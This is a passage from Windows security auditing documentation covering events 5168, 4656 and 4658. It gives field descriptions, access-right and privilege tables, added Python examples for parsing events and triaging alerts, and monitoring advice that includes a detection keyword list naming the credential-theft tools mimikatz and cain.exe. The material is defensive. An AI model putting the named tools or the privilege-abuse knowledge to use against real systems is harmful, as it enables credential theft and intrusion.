<Data Name="SpnName">N/A</Data>
<Data Name="ErrorCode">0xc0000022</Data>
<Data Name="ServerNames">CONTOSO;contoso.local;DC01.contoso.local;DC01;LocalHost;</Data>
<Data Name="ConfiguredNames">N/A</Data>
<Data Name="IpAddresses">127.0.0.1;::1;10.0.0.10;;fe80::31ea:6c3c:f40d:1973;;fe80::5efe:10.0.0.10;</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account for which the SPN check operation failed. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account for which the SPN check operation failed.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
SPN:
SPN Name [Type = UnicodeString]: the SPN which was used to access the server. If no SPN was provided, the value will be “N/A”.

Note Service Principal Name (SPN) is the name by which a client uniquely identifies an instance of a
service. If you install multiple instances of a service on computers throughout a forest, each instance must have
its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients might
use for authentication. For example, an SPN always includes the name of the host computer on which the
service instance is running, so a service instance might register an SPN for each name or alias of its host.

Error Code [Type = HexInt32]: hexadecimal error code, for example “0xC0000022” = STATUS_ACCESS_DENIED. You can find descriptions of all SMB error codes here: https://msdn.microsoft.com/library/ee441884.aspx.
Server Information:
Server Names [Type = UnicodeString]: information about possible server names to use to access the target
server (NETBIOS, DNS, localhost, etc.).
Configured Names [Type = UnicodeString]: information about the names which were provided for
validation. If no information was provided the value will be “N/A”.
IP Addresses [Type = UnicodeString]: information about possible IP addresses to use to access the target
server (IPv4, IPv6).

Security Monitoring Recommendations


For 5168(F): SPN check for SMB/SMB2 failed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

We recommend monitoring for any 5168 event, because it can be a sign of a configuration issue or a malicious
authentication attempt.
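An added example (not part of the original article) implementing the monitoring recommendations for 5144 and 5168 given above: it parses Security event XML like the samples shown, alerts on the deletion of a critical share or of any share on a high-value host, and alerts on every 5168 with the error code decoded. The critical-share list, the high-value host list and the trimmed sample events are constructed for the example; the only NTSTATUS value decoded is the one this page documents.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed samples, trimmed from the 5144 and 5168 event XML shown on this page.
SAMPLE_5144 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing" />
<EventID>5144</EventID><Channel>Security</Channel><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x38d12</Data>
<Data Name="ShareName">\\*\Documents</Data>
<Data Name="ShareLocalPath">C:\Documents</Data>
</EventData></Event>"""

SAMPLE_5168 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing" />
<EventID>5168</EventID><Channel>Security</Channel><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0xd0cd4</Data>
<Data Name="SpnName">N/A</Data>
<Data Name="ErrorCode">0xc0000022</Data>
<Data Name="ServerNames">CONTOSO;contoso.local;DC01.contoso.local;DC01;LocalHost;</Data>
<Data Name="ConfiguredNames">N/A</Data>
<Data Name="IpAddresses">127.0.0.1;::1;10.0.0.10;;fe80::31ea:6c3c:f40d:1973;;fe80::5efe:10.0.0.10;</Data>
</EventData></Event>"""

# Only the status value this page documents; anything else is reported as its raw code.
SMB_STATUS = {0xC0000022: "STATUS_ACCESS_DENIED"}


def parse_event(xml_text):
    """Flatten a Security event into a dict: EventID, Computer and every EventData field."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    rec = {"EventID": int(system.find("e:EventID", NS).text),
           "Computer": system.find("e:Computer", NS).text}
    for d in root.find("e:EventData", NS).findall("e:Data", NS):
        rec[d.get("Name")] = d.text or ""
    return rec


def share_name(rec):
    r"""Strip the \\*\ prefix of Share Name so rules can match the bare share name."""
    return rec.get("ShareName", "").rsplit("\\", 1)[-1]


def evaluate(rec, critical_shares=("SYSVOL", "NETLOGON"),
             high_value_hosts=("DC01.contoso.local",)):
    """Apply the page's recommendations; the default lists are constructed for the example."""
    findings = []
    subject = (f'{rec.get("SubjectDomainName")}\\{rec.get("SubjectUserName")} '
               f'(logon {rec.get("SubjectLogonId")})')
    if rec["EventID"] == 5144:
        name = share_name(rec)
        if name.upper() in {s.upper() for s in critical_shares}:
            findings.append(f"5144: critical share {name} deleted on {rec['Computer']} by {subject}")
        if rec["Computer"].lower() in {h.lower() for h in high_value_hosts}:
            findings.append(f"5144: share {name} ({rec.get('ShareLocalPath')}) deleted on "
                            f"high-value host {rec['Computer']} by {subject}")
    elif rec["EventID"] == 5168:
        # The page recommends alerting on every 5168, so no filter is applied here.
        code = int(rec.get("ErrorCode", "0"), 16)
        status = SMB_STATUS.get(code, "unknown NTSTATUS")
        names = [n for n in rec.get("ServerNames", "").split(";") if n]
        findings.append(f"5168: SMB SPN check failed on {rec['Computer']} for {subject}; "
                        f"SPN={rec.get('SpnName')} error={rec.get('ErrorCode')} ({status}); "
                        f"server names={names}")
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_5144, SAMPLE_5168):
        for finding in evaluate(parse_event(sample)):
            print(finding)
```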
Audit File System
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit File System determines whether the operating system generates audit events when users attempt to
access file system objects.
Audit events are generated only for objects that have configured system access control lists (SACLs), and only
if the type of access requested (such as Write, Read, or Modify) and the account making the request match the
settings in the SACL.
If success auditing is enabled, an audit entry is generated each time any account successfully accesses a file
system object that has a matching SACL. If failure auditing is enabled, an audit entry is generated each time
any user unsuccessfully attempts to access a file system object that has a matching SACL.
These events are essential for tracking activity for file objects that are sensitive or valuable and require extra
monitoring.
Event volume: Varies, depending on how file system SACLs are configured.
No audit events are generated for the default file system SACLs.
This subcategory allows you to audit user attempts to access file system objects, file system object deletion
and permissions change operations and hard link creation actions.
Only one event, “4658: The handle to an object was closed,” depends on the Audit Handle Manipulation
subcategory (Success auditing must be enabled). All other events generate without any additional
configuration.

COMPUTER TYPE      GENERAL SUCCESS  GENERAL FAILURE  STRONGER SUCCESS  STRONGER FAILURE  COMMENTS
Domain Controller  IF               IF               IF                IF                See below.
Member Server      IF               IF               IF                IF
Workstation        IF               IF               IF                IF

Comments (Domain Controller row): We strongly recommend that you develop a File System Security Monitoring policy and define appropriate SACLs for file system objects for different operating system templates and roles. Do not enable this subcategory if you have not planned how to use and analyze the collected information. It is also important to delete non-effective, excess SACLs. Otherwise the auditing log will be overloaded with useless information.
Failure events can show you unsuccessful attempts to access specific file system objects.
Consider enabling this subcategory for critical computers first, after you develop a File System Security Monitoring policy for them.

Events List:
4656(S, F): A handle to an object was requested.
4658(S): The handle to an object was closed.
4660(S): An object was deleted.
4663(S): An attempt was made to access an object.
4664(S): An attempt was made to create a hard link.
4985(S): The state of a transaction has changed.
5051(-): A file was virtualized.
4670(S): Permissions on an object were changed.
4656(S, F): A handle to an object was requested.
4/5/2019

Applies to
Windows 10
Windows Server 2016

Subcategories: Audit File System, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event indicates that specific access was requested for an object. The object could be a file system, kernel, or
registry object, or a file system object on removable storage or a device.
If access was declined, a Failure event is generated.
This event generates only if the object’s SACL has the required ACE to handle the use of specific access rights.
This event shows that access was requested, and the results of the request, but it doesn’t show that the operation
was performed. To see that the operation was performed, check “4663(S): An attempt was made to access an object.”

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4656</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T22:15:19.346776600Z" />
<EventRecordID>274057</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x4367b</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\\Documents\\HBI Data.txt</Data>
<Data Name="HandleId">0x0</Data>
<Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="AccessList">%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424</Data>
<Data Name="AccessReason">%%1538: %%1804 %%1541: %%1809 %%4416: %%1809 %%4417: %%1809 %%4418: %%1802 D:
(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 %%4423: %%1811 D:
(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809</Data>
<Data Name="AccessMask">0x12019f</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="RestrictedSidCount">0</Data>
<Data Name="ProcessId">0x1074</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\notepad.exe</Data>
<Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact\_MS",TI,0x10020,3000))</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012, Windows 8.
    Added “Resource Attributes” field.
    Added “Access Reasons” field.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested a handle to an object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique
identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested a handle to an object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The following is the list of the most common Object Types:

Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Object Name [Type = UnicodeString]: name and other identifying information for the object for which
access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For some
objects, the field does not apply and “-“ is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
Impact_MS: Resource Property ID.
3000: Resource Property Value.

Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the access was requested. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column). If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4660(S): An object was deleted.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-
0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID. These
access rights depend on Object Type. The following table contains information about the most common access
rights for file system objects. Access rights for registry objects are often similar to file system objects, but the
table contains a few notes about how they vary.

ACCESS: HEXADECIMAL VALUE, SCHEMA VALUE
    DESCRIPTION

ReadData (or ListDirectory): 0x1, %%4416
    (For registry objects, this is “Query key value.”)
    ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data.
    ListDirectory - For a directory, the right to list the contents of the directory.

WriteData (or AddFile): 0x2, %%4417
    (For registry objects, this is “Set key value.”)
    WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE).
    AddFile - For a directory, the right to create a file in the directory.

AppendData (or AddSubdirectory or CreatePipeInstance): 0x4, %%4418
    AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY).
    AddSubdirectory - For a directory, the right to create a subdirectory.
    CreatePipeInstance - For a named pipe, the right to create a pipe.

ReadEA: 0x8, %%4419
    (For registry objects, this is “Enumerate sub-keys.”)
    The right to read extended file attributes.

WriteEA: 0x10, %%4420
    The right to write extended file attributes.

Execute/Traverse: 0x20, %%4421
    Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter.
    Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.

DeleteChild: 0x40, %%4422
    For a directory, the right to delete a directory and all the files it contains, including read-only files.

ReadAttributes: 0x80, %%4423
    The right to read file attributes.

WriteAttributes: 0x100, %%4424
    The right to write file attributes.

DELETE: 0x10000, %%1537
    The right to delete the object.

READ_CONTROL: 0x20000, %%1538
    The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).

WRITE_DAC: 0x40000, %%1539
    The right to modify the discretionary access control list (DACL) in the object's security descriptor.

WRITE_OWNER: 0x80000, %%1540
    The right to change the owner in the object's security descriptor.

SYNCHRONIZE: 0x100000, %%1541
    The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.

ACCESS_SYS_SEC: 0x1000000, %%1542
    The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.

Table 14. File System objects access rights.

Access Reasons [Type = UnicodeString] [Version 1]: the list of access check results. The format of this
varies, depending on the object. For kernel objects, this field does not apply.
Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For more
information, see the preceding table.
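An added example (not from the original article) that decodes the 4656 sample above with Table 14: it maps the %%-coded Accesses field and the Access Mask to right names, cross-checks that both describe the same request, splits the Access Reasons field into per-right reason codes together with the SDDL ACE that decided them, and flags write-class rights for triage. The write-class selection is ours, and reason codes such as %%1809 are kept as codes because this page does not list their meanings.

```python
import re

# Table 14 on this page: access name -> (mask bit, %%-coded schema value).
FILE_ACCESS_RIGHTS = {
    "ReadData/ListDirectory": (0x1, "%%4416"),
    "WriteData/AddFile": (0x2, "%%4417"),
    "AppendData/AddSubdirectory/CreatePipeInstance": (0x4, "%%4418"),
    "ReadEA": (0x8, "%%4419"),
    "WriteEA": (0x10, "%%4420"),
    "Execute/Traverse": (0x20, "%%4421"),
    "DeleteChild": (0x40, "%%4422"),
    "ReadAttributes": (0x80, "%%4423"),
    "WriteAttributes": (0x100, "%%4424"),
    "DELETE": (0x10000, "%%1537"),
    "READ_CONTROL": (0x20000, "%%1538"),
    "WRITE_DAC": (0x40000, "%%1539"),
    "WRITE_OWNER": (0x80000, "%%1540"),
    "SYNCHRONIZE": (0x100000, "%%1541"),
    "ACCESS_SYS_SEC": (0x1000000, "%%1542"),
}
SCHEMA_TO_NAME = {code: name for name, (_, code) in FILE_ACCESS_RIGHTS.items()}
KNOWN_BITS = 0
for _bit, _ in FILE_ACCESS_RIGHTS.values():
    KNOWN_BITS |= _bit
# Rights that let the caller change content, ownership or the DACL (our selection).
WRITE_CLASS = {"WriteData/AddFile", "AppendData/AddSubdirectory/CreatePipeInstance",
               "DeleteChild", "WriteAttributes", "DELETE", "WRITE_DAC", "WRITE_OWNER"}

# Field values copied from the 4656 sample event on this page.
SAMPLE_ACCESS_LIST = "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424"
SAMPLE_ACCESS_MASK = 0x12019f
SAMPLE_ACCESS_REASON = (
    "%%1538: %%1804 %%1541: %%1809 %%4416: %%1809 %%4417: %%1809 %%4418: %%1802 D:"
    "(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 "
    "%%4423: %%1811 D:(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809")

# "<access code>: <reason code>" optionally followed by the SDDL entry that decided it.
REASON_RE = re.compile(r"(%%\d+):\s+(%%\d+)(?:\s+([DS]:\([^)]*\)))?")


def decode_access_mask(mask):
    """Names of every Table 14 bit set in the mask, plus any bits the table does not cover."""
    names = [n for n, (bit, _) in FILE_ACCESS_RIGHTS.items() if mask & bit]
    return names, mask & ~KNOWN_BITS


def decode_access_list(access_list):
    """Map the %%-coded Accesses field to names; unknown codes are kept verbatim."""
    return [SCHEMA_TO_NAME.get(code, code) for code in access_list.split()]


def access_list_to_mask(access_list):
    """Rebuild the numeric mask from the Accesses field so it can be compared with Access Mask."""
    mask = 0
    for code in access_list.split():
        if code not in SCHEMA_TO_NAME:
            raise ValueError("schema value not in Table 14: " + code)
        mask |= FILE_ACCESS_RIGHTS[SCHEMA_TO_NAME[code]][0]
    return mask


def parse_access_reasons(text):
    """Access Reasons -> {access code: (reason code, deciding SDDL entry or None)}."""
    return {acc: (reason, ace or None) for acc, reason, ace in REASON_RE.findall(text)}


def triage(access_list, access_mask, process_name):
    """Cross-check the two views of the request and list the write-class rights asked for."""
    names = decode_access_list(access_list)
    return {"rights": names,
            "consistent": access_list_to_mask(access_list) == access_mask,
            "write_class": sorted(set(names) & WRITE_CLASS),
            "process": process_name}


if __name__ == "__main__":
    print(triage(SAMPLE_ACCESS_LIST, SAMPLE_ACCESS_MASK, r"C:\Windows\System32\notepad.exe"))
    for access, (reason, ace) in parse_access_reasons(SAMPLE_ACCESS_REASON).items():
        print(SCHEMA_TO_NAME.get(access, access), reason, ace)
```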
Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used during
the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that
case appears as “-”. See full list of user privileges in the table below:

PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeAssignPrimaryTokenPrivilege Replace a process-level token Required to assign the primary token of


a process.
With this privilege, the user can initiate
a process to replace the default token
associated with a started subprocess.

SeAuditPrivilege Generate security audits With this privilege, the user can add
entries to the security log.

SeBackupPrivilege Back up files and directories - Required to perform backup


operations.
With this privilege, the user can bypass
file and directory, registry, and other
persistent object permissions for the
purposes of backing up the system.
This privilege causes the system to
grant all read access control to any file,
regardless of the access control list
(ACL) specified for the file. Any access
request other than read is still evaluated
with the ACL. The following access
rights are granted if this privilege is
held:
READ_CONTROL
ACCESS_SYSTEM_SECURITY
FILE_GENERIC_READ
FILE_TRAVERSE
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeChangeNotifyPrivilege Bypass traverse checking Required to receive notifications of


changes to files or directories. This
privilege also causes the system to skip
all traversal access checks.
With this privilege, the user can traverse
directory trees even though the user
may not have permissions on the
traversed directory. This privilege does
not allow the user to list the contents of
a directory, only to traverse directories.

SeCreateGlobalPrivilege Create global objects Required to create named file mapping


objects in the global namespace during
Terminal Services sessions.

SeCreatePagefilePrivilege Create a pagefile With this privilege, the user can create
and change the size of a pagefile.

SeCreatePermanentPrivilege Create permanent shared objects Required to create a permanent object.


This privilege is useful to kernel-mode
components that extend the object
namespace. Components that are
running in kernel mode already have
this privilege inherently; it is not
necessary to assign them the privilege.

SeCreateSymbolicLinkPrivilege Create symbolic links Required to create a symbolic link.

SeCreateTokenPrivilege Create a token object Allows a process to create a token which


it can then use to get access to any local
resources when the process uses
NtCreateToken() or other token-creation
APIs.
When a process requires this privilege,
we recommend using the LocalSystem
account (which already includes the
privilege), rather than creating a
separate user account and assigning
this privilege to it.

SeDebugPrivilege Debug programs Required to debug and adjust the


memory of a process owned by another
account.
With this privilege, the user can attach a
debugger to any process or to the
kernel. Developers who are debugging
their own applications do not need this
user right. Developers who are
debugging new system components
need this user right. This user right
provides complete access to sensitive
and critical operating system
components.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeEnableDelegationPrivilege Enable computer and user accounts to Required to mark user and computer
be trusted for delegation accounts as trusted for delegation.
With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.

SeImpersonatePrivilege (Impersonate a client after authentication): With this privilege, the user can impersonate other accounts.

SeIncreaseBasePriorityPrivilege (Increase scheduling priority): Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.

SeIncreaseQuotaPrivilege (Adjust memory quotas for a process): Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.

SeIncreaseWorkingSetPrivilege (Increase a process working set): Required to allocate more memory for applications that run in the context of users.

SeLoadDriverPrivilege (Load and unload device drivers): Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.

SeLockMemoryPrivilege (Lock pages in memory): Required to lock physical pages in memory. With this privilege, the user can use a process to keep data in physical memory, which prevents the system from paging the data to virtual memory on disk. Exercising this privilege could significantly affect system performance by decreasing the amount of available random access memory (RAM).

SeMachineAccountPrivilege (Add workstations to domain): With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.

SeManageVolumePrivilege (Perform volume maintenance tasks): Required to run maintenance tasks on a volume, such as remote defragmentation.

SeProfileSingleProcessPrivilege (Profile single process): Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.

SeRelabelPrivilege (Modify an object label): Required to modify the mandatory integrity level of an object.

SeRemoteShutdownPrivilege (Force shutdown from a remote system): Required to shut down a system using a network request.

SeRestorePrivilege (Restore files and directories): Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent object permissions when restoring backed up files and directories, and can set any valid security principal as the owner of an object.

SeSecurityPrivilege (Manage auditing and security log): Required to perform a number of security-related functions, such as controlling and viewing audit events in the security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.

SeShutdownPrivilege (Shut down the system): Required to shut down a local system.

SeSyncAgentPrivilege (Synchronize directory service data): This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.

SeSystemEnvironmentPrivilege (Modify firmware environment values): Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.

SeSystemProfilePrivilege (Profile system performance): Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.

SeSystemtimePrivilege (Change the system time): Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.

SeTakeOwnershipPrivilege (Take ownership of files or other objects): Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.

SeTcbPrivilege (Act as part of the operating system): This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

SeTimeZonePrivilege (Change the time zone): Required to adjust the time zone associated with the computer's internal clock.

SeTrustedCredManAccessPrivilege (Access Credential Manager as a trusted caller): Required to access Credential Manager as a trusted caller.

SeUndockPrivilege (Remove computer from docking station): Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.

SeUnsolicitedInputPrivilege (user right: not applicable): Required to read unsolicited input from a terminal device.

Restricted SID Count [Type = UInt32]: Number of restricted SIDs in the token. Applicable to only specific Object Types.

Security Monitoring Recommendations

For 4656(S, F): A handle to an object was requested.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the Kernel objects level.
For other types of objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
If Object Name is a sensitive or critical object for which you need to monitor any access attempt, monitor all 4656 events.
If Object Name is a sensitive or critical object for which you need to monitor specific access attempts (for example, only write actions), monitor for all 4656 events with the corresponding Access Request Information\Accesses values.
If you need to monitor files and folders with specific Resource Attribute values, monitor for all 4656 events with specific Resource Attributes field values.
For file system objects, we recommend that you monitor these Access Request Information\Accesses rights (especially for Failure events):
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
4658(S): The handle to an object was closed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Handle Manipulation, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event generates when the handle to an object is closed. The object could be a file system, kernel, or registry object, or a file system object on removable storage or a device.
This event generates only if Success auditing is enabled for the Audit Handle Manipulation subcategory.
Typically this event is needed if you need to know how long the handle to the object was open. Otherwise, it might not have any security relevance.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4658</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-22T00:15:42.910428100Z" />
<EventRecordID>276724</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="5056" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x4367b</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="HandleId">0x18a8</Data>
<Data Name="ProcessId">0xef0</Data>
<Data Name="ProcessName">C:\\Windows\\explorer.exe</Data>
</EventData>
</Event>

Required Server Roles: None.
